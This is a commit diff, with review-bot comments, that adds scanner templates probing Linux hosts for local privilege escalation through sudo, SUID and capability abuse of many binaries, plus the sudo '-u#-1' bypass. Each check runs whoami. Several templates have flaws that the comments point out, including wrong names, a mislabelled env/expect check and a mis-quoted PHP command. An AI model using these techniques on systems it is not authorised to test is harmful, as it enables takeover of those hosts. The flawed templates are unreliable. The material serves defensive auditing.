feat: added privesc

patch-1
Muhammad Daffa 2023-12-13 22:07:24 +07:00
parent 6d68c87f36
commit b2e48fb11f
75 changed files with 3441 additions and 0 deletions


@ -0,0 +1,38 @@
id: CVE-2019-14287
info:
name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
author: princechaddha
severity: high
description: |
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502
metadata:
verified: true
max-request: 2
vendor: canonical
product: ubuntu_linux
tags: cve,cve2019,sudo,ubuntu,linux,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
sudo -u#-1 whoami
matchers:
- type: dsl
dsl:
- '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")'
condition: and
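Review bot: The `name:` line does not describe the issue the rest of this file documents: `id`, `description` and both references are CVE-2019-14287 in sudo before 1.8.28, yet the name reads "GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel", and `vendor: canonical` / `product: ubuntu_linux` likewise point at the wrong product (the NVD CPE for this bug is vendor `sudo_project`, product `sudo`). Suggest `name: Sudo < 1.8.28 - Privilege Escalation (CVE-2019-14287)` and aligning the vendor/product metadata. The second code step runs `sudo` without `-n`, so on a host where the invoking account needs a password sudo prompts or aborts instead of returning a comparable response; `sudo -n -u#-1 whoami` makes the non-interactive intent explicit. The matcher's `contains(code_2_response, "root")` is also satisfied by any username that merely contains "root"; `'trim_space(code_2_response) == "root"'` pins the exact `whoami` output.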


@ -0,0 +1,46 @@
id: privilege-escalation-aa-exec
info:
name: aa-exec - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/aa-exec/
metadata:
verified: true
tags: code,linux,aa-exec,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
aa-exec whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo aa-exec whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
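Review bot: The `dsl` matcher's `contains(code_2_response, "root")` / `contains(code_3_response, "root")` checks and the negative word matcher on `code_1_response` all test for the substring "root", so an unprivileged account named e.g. "groot" fails the baseline check and would pass the escalation check; this same matcher block recurs in every following section of the commit, so fix it once and propagate. `'trim_space(code_2_response) == "root"'` (and likewise for `code_3_response`) compares the whole `whoami` output, or use a `regex` matcher on `^root$`. The `#SUDO` step invokes `sudo` without `-n`, so where the account needs a password it prompts or aborts rather than yielding a response worth matching; `sudo -n aa-exec whoami` states the non-interactive intent. Style: the `#SUID` / `#SUDO` comments should read `# SUID` / `# SUDO` (one space after the hash) per yamllint's `comments` rule, here and in the other sections.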


@ -0,0 +1,46 @@
id: privilege-escalation-ash
info:
name: Ash - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/ash/
metadata:
verified: true
tags: code,linux,ash,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
ash -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo ash -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-awk
info:
name: awk - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/awk/
metadata:
verified: true
tags: code,linux,awk,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
awk 'BEGIN {system("whoami")}'
#SUDO
- engine:
- sh
- bash
source: |
sudo awk 'BEGIN {system("whoami")}'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-bash
info:
name: Bash - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/bash/
metadata:
verified: true
tags: code,linux,bash,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
bash -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo bash -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-cdist
info:
name: Cdist - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/cdist/
metadata:
verified: true
tags: code,linux,cdist,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
cdist shell -s whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo cdist shell -s whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-choom
info:
name: choom - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/choom/
metadata:
verified: true
tags: code,linux,choom,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
choom -n 0 whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo choom -n 0 whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-cpulimit
info:
name: CPUlimit - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/cpulimit/
metadata:
verified: true
tags: code,linux,cpulimit,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
cpulimit -l 100 -f whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo cpulimit -l 100 -f whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-csh
info:
name: csh - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/csh/
metadata:
verified: true
tags: code,linux,csh,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
csh -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo csh -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-csvtool
info:
name: csvtool - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/csvtool/
metadata:
verified: true
tags: code,linux,csvtool,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
csvtool call 'whoami;false' /etc/passwd
#SUDO
- engine:
- sh
- bash
source: |
sudo csvtool call 'whoami;false' /etc/passwd
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-dash
info:
name: Dash - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/dash/
metadata:
verified: true
tags: code,linux,dash,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
dash -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo dash -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-dc
info:
name: dc - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/dc/
metadata:
verified: true
tags: code,linux,dc,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
dc -e '!whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo dc -e '!whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-distcc
info:
name: distcc - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/distcc/
metadata:
verified: true
tags: code,linux,distcc,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
distcc whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo distcc whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-elvish
info:
name: elvish - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/elvish/
metadata:
verified: true
tags: code,linux,elvish,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
elvish -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo elvish -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-enscript
info:
name: enscript - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/enscript/
metadata:
verified: true
tags: code,linux,enscript,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
enscript /dev/null -qo /dev/null -I 'whoami >&2'
#SUDO
- engine:
- sh
- bash
source: |
sudo enscript /dev/null -qo /dev/null -I 'whoami >&2'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
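Review bot: The `-I 'whoami >&2'` filter in the `#SUID` and `#SUDO` steps writes the username to stderr, so the `contains(code_2_response, "root")` / `contains(code_3_response, "root")` matchers can only fire if the code protocol folds stderr into `code_N_response`; I cannot confirm that from the template, so please verify it against the engine's output capture before relying on `verified: true`. The same question applies to the `%(whoami 1>&2)` expressions in the rpmdb and rpmverify sections of this commit.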


@ -0,0 +1,46 @@
id: privilege-escalation-env
info:
name: env - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/env/
metadata:
verified: true
tags: code,linux,env,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
expect -c 'spawn whoami;interact'
#SUDO
- engine:
- sh
- bash
source: |
sudo expect -c 'spawn whoami;interact'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
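Review bot: The `#SUID` and `#SUDO` steps of this `privilege-escalation-env` template never run `env`: both execute `expect -c 'spawn whoami;interact'`, which is the body of the separate expect template added in the same commit, so a match here says nothing about `env`. Following the wrapper pattern the other templates use (`nice whoami`, `ionice whoami`), the two sources should be `env whoami` and `sudo env whoami`.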


@ -0,0 +1,46 @@
id: privilege-escalation-expect
info:
name: expect - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/expect/
metadata:
verified: true
tags: code,linux,expect,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
expect -c 'spawn whoami;interact'
#SUDO
- engine:
- sh
- bash
source: |
sudo expect -c 'spawn whoami;interact'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-find
info:
name: find - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/find/
metadata:
verified: true
tags: code,linux,find,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
find . -exec whoami \; -quit
#SUDO
- engine:
- sh
- bash
source: |
sudo find . -exec whoami \; -quit
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-fish
info:
name: fish - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/fish/
metadata:
verified: true
tags: code,linux,fish,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
fish -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo fish -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-flock
info:
name: Flock - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/flock/
metadata:
verified: true
tags: code,linux,flock,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
flock -u / whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo flock -u / whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-gawk
info:
name: gawk - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/gawk/
metadata:
verified: true
tags: code,linux,gawk,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
gawk 'BEGIN {system("whoami")}'
#SUDO
- engine:
- sh
- bash
source: |
sudo gawk 'BEGIN {system("whoami")}'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-grc
info:
name: grc - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/grc/
metadata:
verified: true
tags: code,linux,grc,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
grc --pty whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo grc --pty whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-ionice
info:
name: ionice - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/ionice/
metadata:
verified: true
tags: code,linux,ionice,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
ionice whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo ionice whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-julia
info:
name: Julia - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/julia/
metadata:
verified: true
tags: code,linux,julia,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
julia -e 'run(`whoami`)'
#SUDO
- engine:
- sh
- bash
source: |
sudo julia -e 'run(`whoami`)'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-lftp
info:
name: lftp - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/lftp/
metadata:
verified: true
tags: code,linux,lftp,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
lftp -c '!whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo lftp -c '!whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-ltrace
info:
name: ltrace - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/ltrace/
metadata:
verified: true
tags: code,linux,ltrace,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
ltrace -b -L whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo ltrace -b -L whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-lua
info:
name: lua - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/lua/
metadata:
verified: true
tags: code,linux,lua,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
lua -e 'os.execute("whoami")'
#SUDO
- engine:
- sh
- bash
source: |
sudo lua -e 'os.execute("whoami")'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-mawk
info:
name: mawk - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/mawk/
metadata:
verified: true
tags: code,linux,mawk,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
mawk 'BEGIN {system("whoami")}'
#SUDO
- engine:
- sh
- bash
source: |
sudo mawk 'BEGIN {system("whoami")}'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-multitime
info:
name: Multitime - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/multitime/
metadata:
verified: true
tags: code,linux,multitime,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
multitime whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo multitime whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-mysql
info:
name: MySQL - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/mysql/
metadata:
verified: true
tags: code,linux,mysql,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
mysql -e '\! whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo mysql -e '\! whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-nawk
info:
name: nawk - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/nawk/
metadata:
verified: true
tags: code,linux,nawk,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
nawk 'BEGIN {system("whoami")}'
#SUDO
- engine:
- sh
- bash
source: |
sudo nawk 'BEGIN {system("whoami")}'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-nice
info:
name: Nice - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/nice/
metadata:
verified: true
tags: code,linux,nice,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
nice whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo nice whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,54 @@
id: privilege-escalation-node
info:
name: Node - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/node/
metadata:
verified: true
tags: code,linux,node,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
#SUDO
- engine:
- sh
- bash
source: |
sudo node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
#Capabilities
- engine:
- sh
- bash
source: |
node -e 'process.setuid(0); require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-nsenter
info:
name: Nsenter - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/nsenter/
metadata:
verified: true
tags: code,linux,nsenter,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
nsenter whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo nsenter whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,54 @@
id: privilege-escalation-perl
info:
name: Perl - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/perl/
metadata:
verified: true
tags: code,linux,perl,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
perl -e 'exec "whoami";'
#SUDO
- engine:
- sh
- bash
source: |
sudo perl -e 'exec "whoami";'
#Capabilities
- engine:
- sh
- bash
source: |
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-pexec
info:
name: pexec - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/pexec/
metadata:
verified: true
tags: code,linux,pexec,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
pexec whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo pexec whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,54 @@
id: privilege-escalation-php
info:
name: PHP - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/php/
metadata:
verified: true
tags: code,linux,php,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
php -r 'system("whoami");'
#SUDO
- engine:
- sh
- bash
source: |
sudo php -r 'system("whoami");'
#Capabilities
- engine:
- sh
- bash
source: |
php -r "posix_setuid(0); system("whoami");"
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or
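Review bot: The `#Capabilities` step `php -r "posix_setuid(0); system("whoami");"` is mis-quoted: the inner `"` characters close the shell's double-quoted string, so PHP receives `posix_setuid(0); system(whoami);`, where `whoami` is a bare constant rather than a string — a fatal error on PHP 8 and only accidentally a string on older versions. Use single quotes on the outside as the other two steps already do: `php -r 'posix_setuid(0); system("whoami");'`.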


@ -0,0 +1,46 @@
id: privilege-escalation-posh
info:
name: posh - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/posh/
metadata:
verified: true
tags: code,linux,posh,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
posh -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo posh -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,54 @@
id: privilege-escalation-python
info:
name: PHP - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/python/
metadata:
verified: true
tags: code,linux,php,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
python -c 'import os; os.system("whoami")'
#SUDO
- engine:
- sh
- bash
source: |
sudo python -c 'import os; os.system("whoami")'
#Capabilities
- engine:
- sh
- bash
source: |
python -c 'import os; os.setuid(0); os.system("whoami")'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or
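Review bot: The `name:` and `tags:` lines are left over from the PHP template: this file's `id` is `privilege-escalation-python`, the reference is the GTFOBins python page and every step runs `python`, yet `name` reads "PHP - Privilege Escalation" and `tags` carries `php`. Change them to `name: Python - Privilege Escalation` and `tags: code,linux,python,privesc`. Note also that a bare `python` binary is absent on many current distributions where only `python3` is installed, so the steps will silently produce no match there; a parallel `python3` step, or a comment saying the check is python2-only, would make that explicit.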


@ -0,0 +1,46 @@
id: privilege-escalation-rake
info:
name: Rake - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rake/
metadata:
verified: true
tags: code,linux,rake,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rake -p '`whoami 1>&0`'
#SUDO
- engine:
- sh
- bash
source: |
sudo rake -p '`whoami 1>&0`'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-rc
info:
name: RC - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rc/
metadata:
verified: true
tags: code,linux,rc,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rc -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo rc -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-rlwrap
info:
name: rlwrap - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rlwrap/
metadata:
verified: true
tags: code,linux,rlwrap,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rlwrap whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo rlwrap whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or


@ -0,0 +1,46 @@
id: privilege-escalation-rpm
info:
name: rpm - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rpm/
metadata:
verified: true
tags: code,linux,rpm,privesc
